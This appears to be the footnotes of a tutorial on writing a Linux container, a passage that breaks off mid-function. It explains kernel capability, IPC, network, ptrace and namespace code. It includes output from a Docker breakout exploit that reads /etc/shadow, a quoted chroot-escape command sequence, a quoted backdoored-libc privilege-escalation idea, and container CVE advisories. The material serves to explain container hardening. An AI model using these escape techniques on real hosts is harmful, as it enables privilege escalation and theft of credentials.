=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Jto0pj...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[*] Found .
[*] Found ..
[*] Found lib64
[*] Found sys
[*] Found run
[*] Found sbin
[*] Found opt
[*] Found tmp
[*] Found lost+found
[*] Found dev
[*] Found mnt
[*] Found root
[*] Found lib
[*] Found boot
[*] Found home
[*] Found usr
[*] Found bin
[*] Found srv
[*] Found etc
[+] Match: etc ino=4325377
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'shadow'
[*] Found binfmt.d
[*] Found ts.conf
[*] Found nscd.conf
[*] Found dhcpcd.duid
[*] Found sensors3.conf
[*] Found libao.conf
[*] Found .
[*] Found motd
[*] Found gdb
[*] Found ..
[*] Found qemu
[*] Found lirc
[*] Found healthd.conf
[*] Found subuid
[*] Found locale.gen.pacnew
[*] Found gtk-3.0
[*] Found idn.conf
[*] Found wgetrc
[*] Found mime.types
[*] Found texmf
[*] Found request-key.conf
[*] Found xinetd.d
[*] Found ssl
[*] Found ifplugd
[*] Found mpd.conf
[*] Found gimp
[*] Found logrotate.d
[*] Found dhcpcd.conf
[*] Found trusted-key.key
[*] Found resolv.conf
[*] Found gemrc
[*] Found libpaper.d
[*] Found hostname
[*] Found kernel
[*] Found audit
[*] Found request-key.d
[*] Found subgid
[*] Found services
[*] Found protocols
[*] Found profile.d
[*] Found Muttrc.dist
[*] Found audisp
[*] Found default
[*] Found resolv.conf.bak
[*] Found ufw
[*] Found man_db.conf
[*] Found gconf
[*] Found geoclue
[*] Found netconfig
[*] Found nanorc
[*] Found environment
[*] Found crypttab
[*] Found brltty.conf
[*] Found logrotate.conf
[*] Found goaccess.conf
[*] Found nsswitch.conf
[*] Found shadow
[+] Match: shadow ino=4334485
[*] Brute forcing remaining 32bit. This can take a while...
[*] (shadow) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x95, 0x23, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x95, 0x23, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
[redacted]
=> cleaning cgroups...done.
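
The `char nh[]` arrays in these transcripts are easier to read once you notice how they line up with the inode numbers on the "Match" lines. Here is a small Python sketch that rebuilds them. It assumes, going only by the output above, that on this filesystem the 8-byte handle is the 32-bit inode number followed by a 32-bit generation number, both little-endian, and that the generation guess that worked was 0. The helper names are hypothetical.

```python
import struct

def guessed_handle(ino, generation=0):
    """8-byte handle as printed by the exploit: inode number, then generation,
    both packed as 32-bit little-endian integers (layout assumed from the output)."""
    return struct.pack("<II", ino, generation)

def as_c_array(handle):
    """Format bytes the way the transcript prints them."""
    return "{" + ", ".join("0x%02x" % b for b in handle) + "}"

# Inode numbers copied from the "[+] Match" lines of the transcripts.
for name, ino in [("etc", 4325377), ("motd", 4325389), ("shadow", 4334485)]:
    print(name, as_c_array(guessed_handle(ino)))
```

The three printed arrays match the `nh[]` lines for etc, motd, and shadow. That is why the brute force only has to search the remaining 32 bits once the inode number is known from the directory listing.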

³⁶

Listing 87: fs/namei.c:316@c8d2bc:

int generic_permission(struct inode *inode, int mask)
{
	int ret;

	/*
	 * Do the basic permission checks.
	 */
	ret = acl_permission_check(inode, mask);
	if (ret != -EACCES)
		return ret;

	if (S_ISDIR(inode->i_mode)) {
		/* DACs are overridable for directories */
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))
			return 0;
		if (!(mask & MAY_WRITE))
			if (capable_wrt_inode_uidgid(inode,
						     CAP_DAC_READ_SEARCH))
				return 0;
		return -EACCES;
	}
	/*
	 * Read/write DACs are always overridable.
	 * Executable DACs are overridable when there is
	 * at least one exec bit set.
	 */
	if (!(mask & MAY_EXEC) || (inode->i_mode & S_IXUGO))
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))
			return 0;

	/*
	 * Searching includes executable on directories, else just read.
	 */
	mask &= MAY_READ | MAY_WRITE | MAY_EXEC;
	if (mask == MAY_READ)
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_READ_SEARCH))
			return 0;

	return -EACCES;
}
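
A quick way to see which capability overrides what is to model the tail of generic_permission in Python. This is only a sketch of the branches in the listing above. It assumes the ordinary DAC check has already returned -EACCES, it represents capabilities as a plain set of names, and it ignores the uid/gid mapping part of capable_wrt_inode_uidgid. The function name and the example modes are hypothetical.

```python
MAY_EXEC, MAY_WRITE, MAY_READ = 0x1, 0x2, 0x4   # values from include/linux/fs.h
S_IXUGO = 0o111                                  # any execute bit set

def capability_override(is_dir, mode, mask, caps):
    """Model of generic_permission() after the DAC check said -EACCES.
    Returns True if a capability in `caps` grants the access anyway."""
    if is_dir:
        if "CAP_DAC_OVERRIDE" in caps:
            return True
        if not (mask & MAY_WRITE) and "CAP_DAC_READ_SEARCH" in caps:
            return True
        return False
    # Read/write is always overridable; exec only if some exec bit is set.
    if (not (mask & MAY_EXEC) or (mode & S_IXUGO)) and "CAP_DAC_OVERRIDE" in caps:
        return True
    mask &= MAY_READ | MAY_WRITE | MAY_EXEC
    return mask == MAY_READ and "CAP_DAC_READ_SEARCH" in caps

locked_file = 0o000   # hypothetical mode bits for a file nobody may touch
print(capability_override(False, locked_file, MAY_READ, {"CAP_DAC_READ_SEARCH"}))   # True
print(capability_override(False, locked_file, MAY_WRITE, {"CAP_DAC_READ_SEARCH"}))  # False
print(capability_override(False, locked_file, MAY_WRITE, {"CAP_DAC_OVERRIDE"}))     # True
print(capability_override(False, locked_file, MAY_EXEC, {"CAP_DAC_OVERRIDE"}))      # False
print(capability_override(True, 0o700, MAY_EXEC, {"CAP_DAC_READ_SEARCH"}))          # True
```

In this model CAP_DAC_READ_SEARCH alone only ever grants reads and directory searches, while writes need CAP_DAC_OVERRIDE.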

³⁷

man 5 acct gives more useful information about this system than man 2 acct.

³⁸

CAP_IPC_OWNER is only used in ipcperms:

Listing 88: ipc/util.c:468@c8d2bc

/**
 * ipcperms - check ipc permissions
 * @ns: ipc namespace
 * @ipcp: ipc permission set
 * @flag: desired permission set
 *
 * Check user, group, other permissions for access
 * to ipc resources. return 0 if allowed
 *
 * @flag will most probably be 0 or S_...UGO from <linux/stat.h>
 */
int ipcperms(struct ipc_namespace *ns, struct kern_ipc_perm *ipcp, short flag)
{
	kuid_t euid = current_euid();
	int requested_mode, granted_mode;

	audit_ipc_obj(ipcp);
	requested_mode = (flag >> 6) | (flag >> 3) | flag;
	granted_mode = ipcp->mode;
	if (uid_eq(euid, ipcp->cuid) ||
	    uid_eq(euid, ipcp->uid))
		granted_mode >>= 6;
	else if (in_group_p(ipcp->cgid) || in_group_p(ipcp->gid))
		granted_mode >>= 3;
	/* is there some bit set in requested_mode but not in granted_mode? */
	if ((requested_mode & ~granted_mode & 0007) &&
	    !ns_capable(ns->user_ns, CAP_IPC_OWNER))
		return -1;

	return security_ipc_permission(ipcp, flag);
}
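
The bit arithmetic in ipcperms is compact, so here is a Python model of it with a few worked cases. This is a sketch rather than the kernel's code: the uid and group comparisons are reduced to two booleans, CAP_IPC_OWNER to a third, and the final security_ipc_permission hook is assumed to allow the access.

```python
def ipcperms(mode, flag, is_owner, in_group, has_cap_ipc_owner):
    """Model of ipcperms(): 0 if allowed, -1 if denied.
    `mode` is the object's permission bits, `flag` the requested ones."""
    # Fold the user/group/other request bits down into the low three bits.
    requested_mode = (flag >> 6) | (flag >> 3) | flag
    granted_mode = mode
    if is_owner:
        granted_mode >>= 6      # compare against the owner bits
    elif in_group:
        granted_mode >>= 3      # compare against the group bits
    # Any requested bit that is not granted needs CAP_IPC_OWNER.
    if (requested_mode & ~granted_mode & 0o007) and not has_cap_ipc_owner:
        return -1
    return 0

# Owner reading a 0600 object: allowed.
print(ipcperms(0o600, 0o400, True, False, False))    # 0
# Unrelated user reading the same object: denied...
print(ipcperms(0o600, 0o400, False, False, False))   # -1
# ...unless it holds CAP_IPC_OWNER.
print(ipcperms(0o600, 0o400, False, False, True))    # 0
# Group member writing a 0640 object: the group only has read, so denied.
print(ipcperms(0o640, 0o200, False, True, False))    # -1
```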

It's used in the following places immediately after looking up the IPC object in the IPC namespace:

In the IPC shared memory system, ipc/shm.c@c8d2bc (done after shm_obtain_object and shm_obtain_object_check):
- ipc/shm.c:869@c8d2bc: shmctl_nolock
- ipc/shm.c:1081@c8d2bc: do_shmat
In the IPC semaphore system, ipc/sem.c@c8d2bc (done after sem_obtain_object and sem_obtain_object_check):
- ipc/sem.c:1200@c8d2bc: semctl_nolock
- ipc/sem.c:1289@c8d2bc: semctl_setval
- ipc/sem.c:1360@c8d2bc: semctl_main
- ipc/sem.c:1816@c8d2bc: semtimedop
In the IPC message queue system, ipc/msg.c@c8d2bc (done after msq_obtain_object and msq_obtain_object_check):
- ipc/msg.c:445@c8d2bc: msgctl_nolock
- ipc/msg.c:630@c8d2bc: do_msgsnd
- ipc/msg.c:846@c8d2bc: do_msgrcv

ipc_check_perms is another thin layer over it that doesn't check the IPC namespace.

Listing 89: ipc/util.c:290@c8d2bc

/**
 * ipc_check_perms - check security and permissions for an ipc object
 * @ns: ipc namespace
 * @ipcprgre: ipc permission set
 * @ops: the actual security routine to call
 * @params: its parameters
 *
 * This routine is called by sys_msgget(), sys_semget() and sys_shmget()
 * when the key is not IPC_PRIVATE and that key already exists in the
 * ds IDR.
 *
 * On success, the ipc id is returned.
 *
 * It is called with ipc_ids.rwsem and ipcp->lock held.
 */
static int ipc_check_perms(struct ipc_namespace *ns,
			   struct kern_ipc_perm *ipcp,
			   const struct ipc_ops *ops,
			   struct ipc_params *params)
{
	int err;

	if (ipcperms(ns, ipcp, params->flg))
		err = -EACCES;
	else {
		err = ops->associate(ipcp, params->flg);
		if (!err)
			err = ipcp->id;
	}

	return err;
}

which is called by ipcget_public.

Listing 90: ipc/util.c:323@c8d2bc

/**
 * ipcget_public - get an ipc object or create a new one
 * @ns: ipc namespace
 * @ids: ipc identifier set
 * @ops: the actual creation routine to call
 * @params: its parameters
 *
 * This routine is called by sys_msgget, sys_semget() and sys_shmget()
 * when the key is not IPC_PRIVATE.
 * It adds a new entry if the key is not found and does some permission
 * / security checkings if the key is found.
 *
 * On success, the ipc id is returned.
 */
static int ipcget_public(struct ipc_namespace *ns, struct ipc_ids *ids,
		const struct ipc_ops *ops, struct ipc_params *params)
{
	struct kern_ipc_perm *ipcp;
	int flg = params->flg;
	int err;

	/*
	 * Take the lock as a writer since we are potentially going to add
	 * a new entry + read locks are not "upgradable"
	 */
	down_write(&ids->rwsem);
	ipcp = ipc_findkey(ids, params->key);
	if (ipcp == NULL) {
		/* key not used */
		if (!(flg & IPC_CREAT))
			err = -ENOENT;
		else
			err = ops->getnew(ns, params);
	} else {
		/* ipc object has been locked by ipc_findkey() */

		if (flg & IPC_CREAT && flg & IPC_EXCL)
			err = -EEXIST;
		else {
			err = 0;
			if (ops->more_checks)
				err = ops->more_checks(ipcp, params);
			if (!err)
				/*
				 * ipc_check_perms returns the IPC id on
				 * success
				 */
				err = ipc_check_perms(ns, ipcp, ops, params);
		}
		ipc_unlock(ipcp);
	}
	up_write(&ids->rwsem);

	return err;
}
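
The four outcomes of ipcget_public are easy to lose in the locking, so here is a tiny Python summary of its branches. The function name and the string labels are hypothetical; in the kernel the "create" and "check permissions" branches go on to call ops->getnew and ipc_check_perms respectively.

```python
IPC_CREAT, IPC_EXCL = 0o1000, 0o2000   # values from include/uapi/linux/ipc.h

def ipcget_public_outcome(key_exists, flg):
    """Which branch of ipcget_public() a request takes."""
    if not key_exists:
        return "create" if flg & IPC_CREAT else "ENOENT"
    if flg & IPC_CREAT and flg & IPC_EXCL:
        return "EEXIST"
    return "check permissions"

print(ipcget_public_outcome(False, 0))                     # ENOENT
print(ipcget_public_outcome(False, IPC_CREAT))             # create
print(ipcget_public_outcome(True, IPC_CREAT | IPC_EXCL))   # EEXIST
print(ipcget_public_outcome(True, IPC_CREAT))              # check permissions
```

Only the last branch reaches ipcperms, and so only that branch consults CAP_IPC_OWNER.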

ipcget_public handles both creation and access for non-IPC_PRIVATE requests. It doesn't check the IPC namespace for existing IPC objects. It's called by ipcget if the key is not IPC_PRIVATE:

Listing 91: ipc/util.c:625@c8d2bc

/**
 * ipcget - Common sys_*get() code
 * @ns: namespace
 * @ids: ipc identifier set
 * @ops: operations to be called on ipc object creation, permission checks
 *       and further checks
 * @params: the parameters needed by the previous operations.
 *
 * Common routine called by sys_msgget(), sys_semget() and sys_shmget().
 */
int ipcget(struct ipc_namespace *ns, struct ipc_ids *ids,
			const struct ipc_ops *ops, struct ipc_params *params)
{
	if (params->key == IPC_PRIVATE)
		return ipcget_new(ns, ids, ops, params);
	else
		return ipcget_public(ns, ids, ops, params);
}

which in turn is called by sys_msgget, sys_semget, and sys_shmget, as its comment says.

But shmget, semget, and msgget are all part of the System V IPC set, and in order to use the objects they return you need to call shmat, semop / semtimedop, and msgsnd / msgrcv, all of which only work for objects in the namespace:

shmat immediately calls do_shmat, which is listed above:

Listing 92: ipc/shm.c:1249@c8d2bc

SYSCALL_DEFINE3(shmat, int, shmid, char __user *, shmaddr, int, shmflg)
{
	unsigned long ret;
	long err;

	err = do_shmat(shmid, shmaddr, shmflg, &ret, SHMLBA);
	if (err)
		return err;
	force_successful_syscall_return();
	return (long)ret;
}

semop calls semtimedop:

Listing 93: ipc/sem.c:20151@c8d2bc

SYSCALL_DEFINE3(semop, int, semid, struct sembuf __user *, tsops,
		unsigned, nsops)
{
	return sys_semtimedop(semid, tsops, nsops, NULL);
}

Listing 94: ipc/sem.c:1816@c8d2bc

SYSCALL_DEFINE4(semtimedop, int, semid, struct sembuf __user *, tsops,
		unsigned, nsops, const struct timespec __user *, timeout)
{
	/* ... */
	ns = current->nsproxy->ipc_ns;

	/* ...
	   allocate some space for things.
	   ...
	*/

	sma = sem_obtain_object_check(ns, semid);

	/* ... */
}

msgsnd and msgrcv immediately call do_msgsnd and do_msgrcv, which are also listed above:

Listing 95: ipc/msg.c:743@c8d2bc

SYSCALL_DEFINE4(msgsnd, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
		int, msgflg)
{
	long mtype;

	if (get_user(mtype, &msgp->mtype))
		return -EFAULT;
	return do_msgsnd(msqid, mtype, msgp->mtext, msgsz, msgflg);
}

Listing 96: ipc/msg.c:1004@c8d2bc

SYSCALL_DEFINE5(msgrcv, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
		long, msgtyp, int, msgflg)
{
	return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}

³⁹

We can see that they're effectively namespaced:

Listing 97: enumerate_net_devs.c

/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -static enumerate_net_devs.c \*/
/*                   -o enumerate_net_devs" */
/* End: */
#include <stdio.h>
#include <net/if.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>

int main (int argc, char **argv)
{
	int sock = socket(PF_LOCAL, SOCK_SEQPACKET, 0);
	for (size_t i = 0; i < 100; i++) {
		struct ifreq req = { .ifr_ifindex = i };
		if (!ioctl(sock, SIOCGIFNAME, &req))
			printf("%3lu: %s\n", i, req.ifr_name);
	}
	return 0;
}

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./enumerate_net_devs
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.7npCN7...done.
=> trying a user namespace...writing /proc/1750/uid_map...writing
/proc/1750/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  1: lo
=> cleaning cgroups...done.

⁴⁰

Network device datastructures are created inside of the kernel, not in userspace with mknod.

For example, ip link add dummy0 type dummy does this:

- Opens a NETLINK_ROUTE netlink socket.
- Sends an RTM_NEWLINK message over it.
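
To give a feel for what that message looks like on the wire, here is a Python sketch that builds one without sending it. The constants are from the kernel's uapi headers. The helper names, the choice of flags, and the exact attribute set are my assumptions about a minimal request, not a dump of what ip actually sends.

```python
import struct

RTM_NEWLINK = 16
NLM_F_REQUEST, NLM_F_ACK, NLM_F_EXCL, NLM_F_CREATE = 0x1, 0x4, 0x200, 0x400
IFLA_IFNAME, IFLA_LINKINFO, IFLA_INFO_KIND = 3, 18, 1

def rtattr(attr_type, payload):
    """One netlink attribute: 4-byte header, payload, padding to 4 bytes."""
    length = 4 + len(payload)
    padding = b"\0" * (-length % 4)
    return struct.pack("=HH", length, attr_type) + payload + padding

def newlink_message(ifname, kind, seq=1):
    """nlmsghdr + ifinfomsg + IFLA_IFNAME + nested IFLA_LINKINFO/IFLA_INFO_KIND."""
    # struct ifinfomsg: family, pad, type, index, flags, change (all zero here).
    ifinfomsg = struct.pack("=BxHiII", 0, 0, 0, 0, 0)
    attrs = rtattr(IFLA_IFNAME, ifname.encode() + b"\0")
    attrs += rtattr(IFLA_LINKINFO, rtattr(IFLA_INFO_KIND, kind.encode()))
    body = ifinfomsg + attrs
    flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL
    # struct nlmsghdr: total length, type, flags, sequence number, port id.
    header = struct.pack("=IHHII", 16 + len(body), RTM_NEWLINK, flags, seq, 0)
    return header + body

msg = newlink_message("dummy0", "dummy")
print(len(msg), msg.hex())
```

Sending it would mean opening `socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE)` and calling `send(msg)`, which needs CAP_NET_ADMIN in the network namespace. There is no device node or mknod anywhere in this.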

Code in net/core/rtnetlink.c@c8d2bc dispatches the message to rtnl_create_link, which does this:

Listing 98: net/core/rtnetlink.c:2239@c8d2bc

struct net_device *rtnl_create_link(struct net *net,
	const char *ifname, unsigned char name_assign_type,
	const struct rtnl_link_ops *ops, struct nlattr *tb[])
{
	int err;
	struct net_device *dev;
	unsigned int num_tx_queues = 1;
	unsigned int num_rx_queues = 1;

	/* ... */

	err = -ENOMEM;
	dev = alloc_netdev_mqs(ops->priv_size, ifname, name_assign_type,
			       ops->setup, num_tx_queues, num_rx_queues);
	if (!dev)
		goto err;

	/* ... */
}

alloc_netdev_mqs calls the setup function:

/**
 *	alloc_netdev_mqs - allocate network device
 *	@sizeof_priv:		size of private data to allocate space for
 *	@name:			device name format string
 *	@name_assign_type:	origin of device name
 *	@setup:			callback to initialize device
 *	@txqs:			the number of TX subqueues to allocate
 *	@rxqs:			the number of RX subqueues to allocate
 *
 *	Allocates a struct net_device with private data area for driver use
 *	and performs basic initialization.  Also allocates subqueue structs
 *	for each queue on the device.
 */
struct net_device *alloc_netdev_mqs(int sizeof_priv, const char *name,
		unsigned char name_assign_type,
		void (*setup)(struct net_device *),
		unsigned int txqs, unsigned int rxqs)
{
	struct net_device *dev;
	size_t alloc_size;
	struct net_device *p;

	/* ... */

	setup(dev);

	/* ... */
}

dummy_setup gets called, since it's the .setup of a rtnl_link_ops:

Listing 100: drivers/net/dummy.c:170@c8d2bc

static struct rtnl_link_ops dummy_link_ops __read_mostly = {
	.kind		= DRV_NAME,
	.setup		= dummy_setup,
	.validate	= dummy_validate,
};

Listing 101: drivers/net/dummy.c:137@c8d2bc

static void dummy_setup(struct net_device *dev)
{
	ether_setup(dev);

	/* Initialize the device structure. */
	dev->netdev_ops = &dummy_netdev_ops;
	dev->ethtool_ops = &dummy_ethtool_ops;
	dev->destructor = free_netdev;

	/* Fill in device structure with ethernet-generic values. */
	dev->flags |= IFF_NOARP;
	dev->flags &= ~IFF_MULTICAST;
	dev->priv_flags |= IFF_LIVE_ADDR_CHANGE | IFF_NO_QUEUE;
	dev->features	|= NETIF_F_SG | NETIF_F_FRAGLIST;
	dev->features	|= NETIF_F_ALL_TSO | NETIF_F_UFO;
	dev->features	|= NETIF_F_HW_CSUM | NETIF_F_HIGHDMA | NETIF_F_LLTX;
	dev->features	|= NETIF_F_GSO_ENCAP_ALL;
	dev->hw_features |= dev->features;
	dev->hw_enc_features |= dev->features;
	eth_hw_addr_random(dev);
}

In other words, there's no equivalent of userspace major / minor device numbers for network devices.

⁴¹

Listing 102: kernel/ptrace.c:1079@c8d2bc:

SYSCALL_DEFINE4(ptrace, long, request, long, pid, unsigned long, addr,
		unsigned long, data)
{
	struct task_struct *child;
	long ret;

	if (request == PTRACE_TRACEME) {
		ret = ptrace_traceme();
		if (!ret)
			arch_ptrace_attach(current);
		goto out;
	}

	child = ptrace_get_task_struct(pid);
	if (IS_ERR(child)) {
		ret = PTR_ERR(child);
		goto out;
	}
	[...]
}

which calls ptrace_get_task_struct:

Listing 103: kernel/ptrace.c:1060@c8d2bc:

static struct task_struct *ptrace_get_task_struct(pid_t pid)
{
	struct task_struct *child;

	rcu_read_lock();
	child = find_task_by_vpid(pid);
	if (child)
		get_task_struct(child);
	rcu_read_unlock();

	if (!child)
		return ERR_PTR(-ESRCH);
	return child;
}

…which in turn calls find_task_by_vpid:

Listing 104: kernel/pid.c:459@c8d2bc:

struct task_struct *find_task_by_vpid(pid_t vnr)
{
	return find_task_by_pid_ns(vnr, task_active_pid_ns(current));
}

which calls find_task_by_pid_ns:

Listing 105: kernel/pid.c:452@c8d2bc:

struct task_struct *find_task_by_pid_ns(pid_t nr, struct pid_namespace *ns)
{
	RCU_LOCKDEP_WARN(!rcu_read_lock_held(),
			 "find_task_by_pid_ns() needs rcu_read_lock() protection");
	return pid_task(find_pid_ns(nr, ns), PIDTYPE_PID);
}

which, finally, calls find_pid_ns. You can see here that it only finds a struct pid * that shares the pid namespace of the current task.

Listing 106: kernel/pid.c:366@c8d2bc:

struct pid *find_pid_ns(int nr, struct pid_namespace *ns)
{
	struct upid *pnr;

	hlist_for_each_entry_rcu(pnr,
			&pid_hash[pid_hashfn(nr, ns)], pid_chain)
		if (pnr->nr == nr && pnr->ns == ns)
			return container_of(pnr, struct pid,
					numbers[ns->level]);

	return NULL;
}
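
The effect of keying the lookup on both the number and the namespace can be shown with a toy model. In this Python sketch a dict stands in for the kernel's pid_hash, and each task gets one number per namespace level, the way struct pid carries one upid per level. The class, the helper names, and the task names are all hypothetical.

```python
class PidNamespace:
    def __init__(self, parent=None):
        self.parent = parent
        self.level = 0 if parent is None else parent.level + 1
        self.next_nr = 1

pid_hash = {}   # (nr, namespace) -> task name; stands in for the kernel's pid_hash

def spawn(name, ns):
    """Give a task a number in its own namespace and in every ancestor."""
    numbers = {}
    walk = ns
    while walk is not None:
        numbers[walk] = walk.next_nr
        pid_hash[(walk.next_nr, walk)] = name
        walk.next_nr += 1
        walk = walk.parent
    return numbers

def find_pid_ns(nr, ns):
    """Like the kernel's find_pid_ns: a hit needs both nr and ns to match."""
    return pid_hash.get((nr, ns))

host = PidNamespace()
container = PidNamespace(parent=host)
spawn("init", host)                        # host pid 1
spawn("sshd", host)                        # host pid 2
inner = spawn("contained-sh", container)   # container pid 1, host pid 3

print(find_pid_ns(1, container))    # contained-sh
print(find_pid_ns(2, container))    # None: sshd has no number in the container
print(find_pid_ns(inner[host], host))   # contained-sh, as seen from the host
```

A task inside the container can name its own processes, but no number it passes to ptrace resolves to a host-only task.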

⁴²

The kill syscalls call kill_something_info, which follows a dense call chain (kill_pid_info -> group_send_sig_info -> do_send_sig_info -> send_sig_info -> send_signal -> __send_signal) and eventually ends up in __send_signal, which does respect user namespaces:

Listing 107: kernel/signal.c:972@c8d2bc

static int __send_signal(int sig, struct siginfo *info, struct task_struct *t,
			int group, int from_ancestor_ns)
{
	/* ... */
	q = __sigqueue_alloc(sig, t, GFP_ATOMIC | __GFP_NOTRACK_FALSE_POSITIVE,
		override_rlimit);
	if (q) {
		list_add_tail(&q->list, &pending->list);
		switch ((unsigned long) info) {
		case (unsigned long) SEND_SIG_NOINFO:
			q->info.si_signo = sig;
			q->info.si_errno = 0;
			q->info.si_code = SI_USER;
			q->info.si_pid = task_tgid_nr_ns(current,
							task_active_pid_ns(t));
			q->info.si_uid = from_kuid_munged(current_user_ns(), current_uid());
			break;
		case (unsigned long) SEND_SIG_PRIV:
			q->info.si_signo = sig;
			q->info.si_errno = 0;
			q->info.si_code = SI_KERNEL;
			q->info.si_pid = 0;
			q->info.si_uid = 0;
			break;
		default:
			copy_siginfo(&q->info, info);
			if (from_ancestor_ns)
				q->info.si_pid = 0;
			break;
		}

		userns_fixup_signal_uid(&q->info, t);
	}
	/*...*/
}

⁴³

Quoting man 7 capabilities, again:

	CAP_SETGID
		Make  arbitrary  manipulations   of  process  GIDs  and
		supplementary GID  list; forge GID when  passing socket
		credentials via  UNIX domain sockets; write  a group ID
		mapping in a user namespace (see user_namespaces(7)).
	CAP_SETUID
		Make   arbitrary   manipulations    of   process   UIDs
		(setuid(2),  setreuid(2),  setresuid(2),  setfsuid(2));
		forge  UID when  passing  socket  credentials via  UNIX
		domain  sockets; write  a  user ID  mapping  in a  user
		namespace (see user_namespaces(7)).
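
For reference, the mappings mentioned here are lines of three numbers: the first ID inside the namespace, the first ID outside it, and the length of the range, as described in user_namespaces(7). Here is a minimal Python sketch of how such a map translates an ID. The function names and the example map `0 10000 2000` are hypothetical.

```python
def parse_id_map(text):
    """Parse uid_map/gid_map lines: 'inside-start outside-start length'."""
    return [tuple(int(field) for field in line.split())
            for line in text.splitlines() if line.strip()]

def map_to_outside(inside_id, id_map):
    """Translate an ID inside the namespace to the ID outside it."""
    for inside_start, outside_start, length in id_map:
        if inside_start <= inside_id < inside_start + length:
            return outside_start + (inside_id - inside_start)
    return None   # unmapped

id_map = parse_id_map("0 10000 2000\n")   # hypothetical map
print(map_to_outside(0, id_map))      # 10000: "root" inside is uid 10000 outside
print(map_to_outside(1999, id_map))   # 11999
print(map_to_outside(2000, id_map))   # None: outside the mapped range
```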

⁴⁴

Brad Spengler's "False Boundaries and Arbitrary Code Execution", again:

CAP_SYS_CHROOT: generic: From Julien Tinnes/Chris Evans: if you have write access to the same filesystem as a suid root binary, set up a chroot environment with a backdoored libc and then execute a hardlinked suid root binary within your chroot and gain full root privileges through your backdoor

⁴⁵

man 2 chroot:

This call does not change the current working directory, so that after the call '.' can be outside the tree rooted at '/'. In particular, the superuser can escape from a "chroot jail" by doing:
mkdir foo; chroot foo; cd ..

⁴⁶

There have been issues with unpacking containers in Docker and LXC:

Listing 110: Docker 1.3.2 - Security Advisory {24 Nov 2014}

=====================================================
[CVE-2014-6407] Archive extraction allowing host privilege escalation
=====================================================
Severity: Critical
Affects: Docker up to 1.3.1

The Docker engine, up to and including version 1.3.1, was vulnerable to
extracting files to arbitrary paths on the host during ‘docker pull’ and
‘docker load’ operations. This was caused by symlink and hardlink
traversals present in Docker's image extraction. This vulnerability could
be leveraged to perform remote code execution and privilege escalation.

Listing 111: Docker 1.6.1 - Security Advisory {150507}

====================================================================

[CVE-2015-3629] Symlink traversal on container respawn allows local
privilege escalation

====================================================================

Libcontainer version 1.6.0 introduced changes which facilitated a mount
namespace breakout upon respawn of a container. This allowed malicious
images to write files to the host system and escape containerization.

Listing 112: Security issues in LXC (CVE-2015-1331 and CVE-2015-1334), from Tyler Hicks

* Roman Fiedler discovered a directory traversal flaw that allows
  arbitrary file creation as the root user. A local attacker must set up
  a symlink at /run/lock/lxc/var/lib/lxc/<CONTAINER>, prior to an admin
  ever creating an LXC container on the system. If an admin then creates
  a container with a name matching <CONTAINER>, the symlink will be
  followed and LXC will create an empty file at the symlink's target as
  the root user.
  - CVE-2015-1331
  - Affects LXC 1.0.0 and higher
  - https://launchpad.net/bugs/1470842
  - https://github.com/lxc/lxc/commit/72cf81f6a3404e35028567db2c99a90406e9c6e6 (master)
  - https://github.com/lxc/lxc/commit/61ecf69d7834921cc078e14d1b36c459ad8f91c7 (stable-1.1)
  - https://github.com/lxc/lxc/commit/f547349ea7ef3a6eae6965a95cb5986cd921bd99 (stable-1.0)

* Roman Fiedler discovered a flaw that allows processes intended to be
  run inside of confined LXC containers to escape their AppArmor or
  SELinux confinement. A malicious container can create a fake proc
  filesystem, possibly by mounting tmpfs on top of the container's
  /proc, and wait for a lxc-attach to be ran from the host environment.
  lxc-attach incorrectly trusts the container's
  /proc/PID/attr/{current,exec} files to set up the AppArmor profile and
  SELinux domain transitions which may result in no confinement being
  used.
  - CVE-2015-1334
  - Affects LXC 0.9.0 and higher
  - https://launchpad.net/bugs/1475050
  - https://github.com/lxc/lxc/commit/5c3fcae78b63ac9dd56e36075903921bd9461f9e (master)
  - https://github.com/lxc/lxc/commit/659e807c8dd1525a5c94bdecc47599079fad8407 (stable-1.1)
  - https://github.com/lxc/lxc/commit/15ec0fd9d490dd5c8a153401360233c6ee947c24 (stable-1.0)

Tyler

These are all really interesting! I want to write more about them.
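
The common thread is a path that gets resolved through a link the attacker controls. As an illustration only, here is a Python sketch of the kind of check an unpacker can make before writing a member. The function name is hypothetical, this is not how Docker or LXC fixed their bugs, and a check like this is still racy if the tree can change between the check and the write.

```python
import os
import tempfile

def safe_destination(root, member_name):
    """Return the path a member would be written to, or None if it would
    land outside `root`. Symlinks already on disk are resolved first."""
    root = os.path.realpath(root)
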